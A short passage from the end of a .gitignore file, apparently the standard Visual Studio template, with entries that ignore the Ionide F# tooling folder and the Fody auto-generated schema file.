359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------